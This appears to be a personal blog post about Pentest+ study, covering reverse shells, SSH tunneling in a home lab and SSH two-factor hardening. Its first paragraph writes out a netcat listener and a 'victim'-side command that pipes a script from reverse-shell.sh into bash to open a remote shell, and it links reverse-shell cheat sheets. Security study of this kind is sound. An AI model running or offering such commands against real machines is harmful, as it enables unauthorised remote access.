---
title: Reverse Shells, SSH Redirection, and SSH Hardening
# subtitle: Making a Gallery
date: 2022-01-23
tags: ["SSH", "security"]
---

Currently I am working on reverse shells in my Pentest+ studies. [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings) has a great up to date [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md). This cheatsheet combined with the [Reverse Shell Generator](https://www.revshells.com/) and you should have all the resources you need to get a reverse shell going quick. I discovered a cool ["reverse shell as a service" tool](https://github.com/lukechilds/reverse-shell) that simplifies getting a reverse shell. Here are the command I use to get a reverse shell going. First I start a listener `nc -nlvp 44444` on the target machine we want to send our victim to. On the victims machine I use `knock TARGET_IP 10000 11000 12000 -d 25 && curl https://reverse-shell.sh/TARGET_IP:44444 | bash` to connect to the target server and start a reverse shell. In the example you need to replace TARGET_IP with the target IP where you have the listener running. The knock command in my example is needed to open up port 44444 via port knocking. 

During my normal meandering of Hacker News I came across [The Cyber Plumbers Handbook](https://github.com/opsdisk/the_cyber_plumbers_handbook) "The definitive guide to Secure Shell (SSH) tunneling, port redirection, and bending traffic like a boss.". This was a great read, I made sure to take my time and go through each of the exercises presented in my home lab. It was great to finally fully understand SSH tunneling for both local and remote port forwards. I also learned how to use jump boxes and use proxychains through a SOCKS Proxy server all through the command line. 

The more I hack the more I realize the need to increase my security posture as well. I enabled 2FA for all of my SSH connections using [this guide](https://goteleport.com/blog/how-to-setup-ssh-2fa/). [HackTricks](https://book.hacktricks.xyz/) has some good [shell cheat sheets](https://book.hacktricks.xyz/shells/shells) as well.
